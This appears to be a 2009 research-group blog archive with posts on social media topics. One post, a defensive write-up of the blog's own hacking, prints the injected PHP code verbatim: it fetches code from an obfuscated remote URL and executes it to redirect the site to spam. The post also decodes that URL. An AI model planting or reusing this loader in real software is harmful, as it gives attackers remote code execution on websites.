MySpace in the digital Cambrian period

December 5th, 2009

Financial Times has a long article describing The rise and fall of MySpace. It’s a story full of bad timing, missed opportunities, suits vs. geeks, personalities and, I suppose, random chance. I hope at least a few fossils from our age will be preserved for future generations to study.

Visualizing social media use in 16 countries

December 5th, 2009

Trendstream’s Global Web Index has a visualization, Global Map of Social Web, that shows the uptake of different social media systems in 16 countries around the world.

Map of the Social Web
Full size pdf

It’s a little busy, but it overlays a lot of information on the world map.

“The map visualises the number of active bloggers, social networkers, video sharers, photo uploaders and microbloggers. The length of the curve represents the penetration and the size represents the universe size. We have also included the actual numbers so you can use and apply the universe estimates.”

I was surprised to see the variation in popularity of the different modalities.

(via Mashable)

Twitter to add support for geotagging tweet locations

August 21st, 2009

Twitter is adding support for geotagging tweets to its API, which will make Twitter a richer source of real-time news. The Twitter blog reports:

“Twitter platform developers have been doing innovative work with location for some time despite having access to only a rudimentary level of API support. Most of the location-based projects we see are built using the simple, account-level location field folks can fill out as part of their profile. Since anything can be written in this field, it’s interesting but not very dependable.

We’re gearing up to launch a new feature which makes Twitter truly location-aware. A new API will allow developers to add latitude and longitude to any tweet. Folks will need to activate this new feature by choice because it will be off by default and the exact location data won’t be stored for an extended period of time. However, if people do opt-in to sharing location on a tweet-by-tweet basis, compelling context will be added to each burst of information.”

This opens up lots of interesting opportunities, but there is still room for geotagging from content. There is more than one relationship between a tweet (or any utterance) and a location: where the tweeter was when it was sent, but also the location of the event or object that is the tweet’s subject.

For example, the Baltimore police use Twitter to inform the press and public about significant crimes, major traffic problems and other events. There are 10-15 tweets a day in this stream, all sent by an officer in the BPD Public Affairs department. The majority of the tweets mention a location (e.g., “Shooting on Lafayette Ave, Suspect in Police custody, handgun recovered.”) but are, I assume, sent from the Public Affairs office. Baltimore city covers a large area, more than 80 square miles. Many residents and reporters will be interested only in events in or affecting the neighborhoods where they live, work or pass through when commuting.
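The two kinds of location can be kept distinct in code. Here is a minimal sketch: the API-supplied geotag goes in one field and a place name extracted from the text goes in another. The regex and field names are my own illustrations, not Twitter’s API.

```python
import re

# Illustrative pattern for street-name mentions like "Lafayette Ave";
# a real system would use a gazetteer or geoparser instead.
STREET_RE = re.compile(r"\b([A-Z][a-z]+(?: [A-Z][a-z]+)* (?:Ave|St|Rd|Blvd))\b")

def locations_for(tweet_text, sender_geo=None):
    """Return both locations associated with a tweet: where it was
    sent from (the API geotag, if any) and the place its content
    is about (extracted from the text)."""
    m = STREET_RE.search(tweet_text)
    return {
        "sender_geo": sender_geo,      # e.g., (39.29, -76.61) for downtown Baltimore
        "subject_place": m.group(1) if m else None,
    }

print(locations_for("Shooting on Lafayette Ave, Suspect in Police custody"))
```

For the BPD stream, `sender_geo` would nearly always be the Public Affairs office while `subject_place` is what neighborhood-level filtering actually needs.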

I also wonder if there are more opportunities for Twitter to add semantic metadata to Tweets via their API.

See also: Bits Blog, O’Reilly.

DoD social media ambivalence

August 7th, 2009

The Department of Defense remains conflicted about its position on social media.

This past Sunday the US Marine Corps announced an immediate ban of Internet social networking sites on its NIPRNET network due to potential security risks. Specific examples of the newly banned sites included Facebook, MySpace, and Twitter.

Adm. Mike Mullen, chairman of the Joint Chiefs of Staff, tweeted yesterday.

“Obviously we need to find right balance between security and transparency. We are working on that. But am I still going to tweet? You bet.”

The comment also appeared on Admiral Mullen’s facebook page.

While it’s tempting to poke fun at the apparent contradiction, there is a real difference between the two cases. It’s well known that there are many vulnerabilities on the Web that can compromise a computer, and that they are more likely to be encountered in open, popular environments like social media systems. So it’s prudent to limit access to some of these from networks like NIPRNET that are used for sensitive information. On the other hand, we can assume that the computers used by Admiral Mullen and his staff for public announcements and PR are on conventional networks, so the risks associated with security problems are greatly reduced.

Still, you have to admit that it’s ironic.

DOS attacks on Twitter et al. focused on Georgian blogger Cyxymu

August 6th, 2009

Elinor Mills of CNET reports that the DOS attacks against Twitter, Facebook, LiveJournal and Blogger were focused on a single pro-Georgian blogger using the name Cyxymu.

A pro-Georgian blogger with accounts on Twitter, Facebook, LiveJournal and Google’s Blogger and YouTube was targeted in a denial of service attack that led to the site-wide outage at Twitter and problems at the other sites on Thursday, according to a Facebook executive.

The blogger, who uses the account name “Cyxymu,” (the name of a town in the former Soviet Republic) had accounts on all of the different sites that were attacked at the same time, Max Kelly, chief security officer at Facebook, told CNET News.

“It was a simultaneous attack across a number of properties targeting him to keep his voice from being heard,” Kelly said. “We’re actively investigating the source of the attacks and we hope to be able to find out the individuals involved in the back end and to take action against them if we can.”

According to the Register article “Researcher: Twitter attack targeted anti-Russian blogger,” the DOS attack was driven by spam rather than a botnet. Spam messages enticed their recipients to click on a link to one of Cyxymu’s many social media accounts.

You can try to access Cyxymu’s pages on twitter, livejournal, facebook, blogger and youtube.

CFP: JWS special issue on Semantic Web and Social Media

June 27th, 2009

Important dates:

  • abstracts: 21 Sept 09
  • submissions: 01 Oct 09
  • notification: 15 Dec 09
  • final copy: 15 Jan 10
  • publication: April 10

The Journal of Web Semantics will publish a special issue on Data Mining and Social Network Analysis for integrating Semantic Web and Web 2.0 in the spring of 2010. The special issue will be edited by Bettina Berendt, Andreas Hotho and Gerd Stumme and initial abstracts for papers must be submitted via the Elsevier EES system by September 21, 2009.

The special issue invites contributions that show how synergies between Semantic Web and Web 2.0 techniques can be successfully used. Since both communities work on network-like data structures, analysis methods from different fields of research could form a link between them. Techniques can be – but are not limited to – social network analysis, graph analysis, machine learning and data mining methods.

Relevant topics include

  • ontology learning from Web 2.0 data
  • instance extraction from Web 2.0 systems
  • analysis of Blogs
  • discovering social structures and communities
  • predicting trends and user behaviour
  • analysis of dynamic networks
  • using content of the Web for modelling
  • discovering misuse and fraud
  • network analysis of social resource sharing systems
  • analysis of folksonomies and other Web 2.0 data structures
  • analysis of Web 2.0 applications and their data
  • deriving profiles from usage
  • personalized delivery of news and journals
  • Semantic Web personalization
  • Semantic Web technologies for recommender systems
  • ubiquitous data mining in Web (2.0) environment
  • applications

Ebiquity Google alert tripwires triggered

May 21st, 2009

Yesterday we discovered that our ebiquity blog had been hacked. It looks like a vulnerability in our old WordPress installation was exploited to add the following code to the top of our blog’s main page.

<?php $site = create_function('','$cachedir="/tmp/"; $param="qq"; $key=$_GET[$param]; $rand="1239aef"; $said=23; $type=1; $stprot=""; '.file_get_contents(strrev("txt.mrahp/elpmaxe/deliated/ofni.pwgolb//:ptth"))); $site(); ?>

This code caused our blog’s URLs to redirect to a spam page. We’ve upgraded the blog to the latest WordPress release, which hopefully will prevent this exploit from being used again. (Notice the reversed URL — LOL!)
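The obfuscation is shallow: the payload hides the URL it fetches by storing it backwards, which PHP’s strrev() undoes at runtime. A one-liner reveals it offline:

```python
# The attacker stored the payload URL reversed to dodge naive string
# scans; reversing it back exposes where the injected code phones home.
obfuscated = "txt.mrahp/elpmaxe/deliated/ofni.pwgolb//:ptth"
print(obfuscated[::-1])  # http://blogwp.info/detailed/example/pharm.txt
```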

We discovered the problem through a clever trick I read about last year on a site I’ve forgotten (maybe here). We created several Google Alerts triggered by the appearance of spam-related words on pages apparently hosted on our site. For example:

  • adult OR girls OR sex OR sexx OR XXX OR porn OR pornography
  • viagra OR cialis OR levitra OR Phentermine OR Xanax

I would get several false positives a month from these alerts triggered by non-spam entries on our site. In fact, *this* post will generate a false positive. But yesterday I got a true positive. Looking at the log files, I think I got the alert within a few hours of when our blog was hacked. So I am happy to say that this worked and worked well. Without this alert, it might have taken weeks to notice the problem.

Google alert for a hacked website

The results of this Google search reveal many compromised blogs from the .edu domain.
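The same tripwire idea can also be run locally against your own pages. A minimal sketch (the keyword list mirrors the alert queries above; fetching the pages is left out, so it just scans supplied text):

```python
# Local version of the Google Alert tripwire: scan page text for
# spam-related keywords that should never appear on a research blog.
SPAM_WORDS = {"viagra", "cialis", "levitra", "phentermine", "xanax",
              "porn", "pornography", "xxx"}

def spam_hits(page_text):
    """Return a sorted list of spam keywords found in the page text."""
    words = {w.strip(".,!?").lower() for w in page_text.split()}
    return sorted(words & SPAM_WORDS)

print(spam_hits("Buy cheap Viagra and Cialis now!"))  # ['cialis', 'viagra']
```

Like the Google Alert version, this will throw false positives on posts that merely discuss spam, but a cron job mailing any hits would give the same few-hour detection window.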

Can a programming language make you happy?

May 11th, 2009

We all know that some programming languages are a joy to use and others can be damned painful. Lukas Biewald ran an interesting experiment to gather some data about this in his post, The Programming Language with the Happiest Users.

“Which languages make programmers the happiest? … I decided to do a little market research. I scraped the top 150 most recent tweets on Twitter for the query “X language” where X was one of {COBOL, Ruby, Fortran, Python, Visual Basic, Perl, Java, Haskell, Lisp, C}. Then I asked three people on Amazon Mechanical Turk to verify that the tweet was on the topic. If so, I asked if the tweet seemed positive, negative or neutral. …”

Great idea and a nice use of Amazon Mechanical Turk!
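The scoring step is easy to sketch. Assuming each tweet ends up with three Turker labels, one plausible way to turn them into a happiness score (my reconstruction, not Biewald’s actual code):

```python
from collections import Counter

def happiness(tweet_labels):
    """tweet_labels: a list of 3-label lists, one per tweet, with labels
    "positive", "negative" or "neutral". Score a language as
    (positive-majority tweets - negative-majority tweets) / total tweets."""
    pos = neg = 0
    for labels in tweet_labels:
        vote, count = Counter(labels).most_common(1)[0]
        if count < 2:            # no majority among the three Turkers; skip
            continue
        pos += vote == "positive"
        neg += vote == "negative"
    return (pos - neg) / len(tweet_labels)

sample = [["positive", "positive", "neutral"],
          ["positive", "negative", "positive"],
          ["neutral", "neutral", "negative"]]
print(happiness(sample))  # 2 positive, 0 negative out of 3 -> 0.666...
```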

Storms on Planet Social Media Research

May 7th, 2009

We maintain Planet Social Media Research (SMR) as a feed aggregator for a set of blogs relevant to research in social media systems. A few days ago I noticed that it wasn’t including new posts from some of the blogs. After updating the Planet Venus software we use and poking around I discovered that our server is unable to access any feeds that resolve to Feedburner.

Apparently Feedburner has a blacklist of IP addresses that it blocks, and our server must now be on it. We have a request in to straighten this out and hope that everything will be back to normal very soon. (I was able to get our own blog back onto Planet SMR by reconfiguring the system to revert to the old, non-Feedburner feed.)

We’ve not yet heard from Feedburner/Google and don’t know why we are on their blacklist. It’s unlikely to be a result of our accessing feeds too frequently: we rebuild the site and aggregated feed once an hour and only about ten of our feeds resolve to feedburner.

My speculation is that this is collateral damage in the global war on spam. The easiest way for splogs (spam blogs) to get content is to hijack feeds from other blogs. Web spammers can do even better at disguising their splogs as legitimate sites if they aggregate several feeds that are topically related.

One way to fight such splogs is to deny them access to the feeds. So Google could be trying to protect Feedburner users, and also be a good steward of the Web environment, by blocking suspected web spammers from the feeds hosted by Feedburner.

So, my guess is that Google thinks that the Planet SMR site is a splog. We are not, of course. We only include the feeds of blogs that want to be on SMR, and we do not host any ads, which is a motivation for most splogs.

If our speculation is right, and Google is blocking our access because it thinks we are a splog site, then there will be many other legitimate feed aggregator sites that have or soon will have this problem.

By the way — we are always interested in suggestions for new blogs to add to Planet SMR. If you have or know of one, contact us at planet-smr at

update 5/8: We’ve identified and solved the problem, thanks to Google Freebase ‘community expert’ Franklin Tse. The problem was due to our having an old entry for the Feedburner IP address in the server’s /etc/hosts table. I think we added it when we were having some technical difficulties some years ago and wanted to keep our key services running smoothly. I guess the trouble with quick temporary hacks is that they’re easy to forget, and they come back to bite you.
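A stale /etc/hosts pin is easy to spot once you think to look for one. Here is a minimal sketch that lists the hostnames a hosts file overrides; the sample contents and IP address are illustrative, not our actual entry:

```python
def pinned_hosts(hosts_text):
    """Map each hostname in /etc/hosts-style text to its pinned IP,
    skipping comments and blank lines."""
    pins = {}
    for line in hosts_text.splitlines():
        line = line.split("#")[0].strip()   # drop comments
        if not line:
            continue
        ip, *names = line.split()
        for name in names:
            pins[name] = ip
    return pins

sample = """
127.0.0.1  localhost
# added years ago during an outage -- and forgotten since:
66.102.15.101  feeds.feedburner.com
"""
print(pinned_hosts(sample))
```

Comparing these pins against live DNS (e.g., with dig) flags any entry that no longer matches reality.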

Twitter vs. Facebook: fad vs. need?

April 3rd, 2009

Earlier this week the Baltimore Sun’s Andrew Ratner had a story on Twitter, When did Twitter take over the universe?. The story had this interesting quote from UMBC’s Zeynep Tufekci:

Some people who study technology aren’t sure Twitter will endure.

“Frankly, I think a lot of twittering is somewhat faddish, whereas I never thought Facebook was. … People I interviewed and surveyed would talk of serious feeling of deprivation without Facebook and I’ve hardly heard anyone say that about twitter,” Zeynep Tufekci, an assistant professor who teaches the sociology of technology at the University of Maryland, Baltimore County, wrote in an e-mail. “Will people Twitter five years from now? Perhaps, but I would not be surprised if they did not, or at least as much.”

CUNY J-school experiments with hyperlocal news

March 1st, 2009

Traditional newspapers are in crisis. Last week the 150-year-old Rocky Mountain News published its last issue and the Philadelphia Inquirer filed for bankruptcy. Experts have been saying for some time that newspapers need to focus on the one aspect that cannot be commoditized — local news. It’s also clear that news content delivered via ink on dead trees is not a working model for the future.

Jeff Jarvis, director of CUNY’s interactive journalism program, describes one new experiment that sounds very promising in a post titled The Times & CUNY (and others) go hyperlocal.

The New York Times is about to announce that it is starting a hyperlocal product called The Local working with our students at CUNY’s Graduate School of Journalism. PaidContent has the story early. So I’ll tell you about the school’s and my involvement and plans.

At CUNY, we were working on a hyperlocal plan of our own, aimed at taking one New York neighborhood and turning it into the ultimate hyperlocal community as a showcase to both demonstrate how a community could be empowered to report on itself and to create a laboratory where our students could learn to interact with the public in new and collaborative ways. The problem with teaching interactive journalism, which is what we call my department, is that students don’t have a public with whom to interact.

Facebook blinks, reverts to old Terms of Service agreement

February 18th, 2009

Late last night Facebook CEO Mark Zuckerberg announced in a blog post, Update on Terms, that they have rolled back the recent changes to their Terms of Service agreement and restored the previous one.

“Many of us at Facebook spent most of today discussing how best to move forward. One approach would have been to quickly amend the new terms with new language to clarify our positions further. Another approach was simply to revert to our old terms while we begin working on our next version. As we thought through this, we reached out to respected organizations to get their input.

Going forward, we’ve decided to take a new approach towards developing our terms. We concluded that returning to our previous terms was the right thing for now. As I said yesterday, we think that a lot of the language in our terms is overly formal and protective so we don’t plan to leave it there for long.”

The NYT reported the change in a story today, Facebook Withdraws Changes in Data Use.

In his post, Zuckerberg continued by observing that with 175 million members, Facebook, if it were a country, would be the sixth most populous in the world. Of course, sometimes a population revolts and lays claim to certain unalienable rights, among them life, liberty, the pursuit of happiness and ownership of one’s online content.

So, the missing clause is back in the FB TOS:

“You may remove your User Content from the Site at any time. If you choose to remove your User Content, the license granted above will automatically expire, however you acknowledge that the Company may retain archived copies of your User Content.”

This revision is dated 23 September 2008. Curiously, I checked the Internet Archive to review the history of FB’s TOS but found that there are no archived copies after 12 October 2007. I can only imagine that FB asked the Internet Archive to stop saving copies of this public page. I note that the last archived copies of many of their public pages (e.g., privacy policy, developers page, etc.) are also from 2007. These pages are not blocked by the FB robots.txt and are normally accessible to anyone, so it must be by a specific request that they not be archived.
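Whether a robots.txt blocks archiving is easy to check programmatically with Python’s standard urllib.robotparser; the Internet Archive’s crawler identifies itself as ia_archiver. The rules below are illustrative, not Facebook’s actual robots.txt:

```python
from urllib.robotparser import RobotFileParser

# Parse hypothetical robots.txt rules from a string rather than
# fetching them, then ask what the Internet Archive's crawler may fetch.
rp = RobotFileParser()
rp.parse("""
User-agent: ia_archiver
Disallow: /private/
""".splitlines())

print(rp.can_fetch("ia_archiver", "http://example.com/terms.php"))   # True
print(rp.can_fetch("ia_archiver", "http://example.com/private/x"))   # False
```

Since FB’s public policy pages pass this kind of check, the missing snapshots presumably stem from a direct exclusion request to the Archive rather than from robots.txt.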

That’s too bad. Having an easy way to see how the policies of important social sites like FB evolve would be a great resource to those who study online social media as well as to many curious users.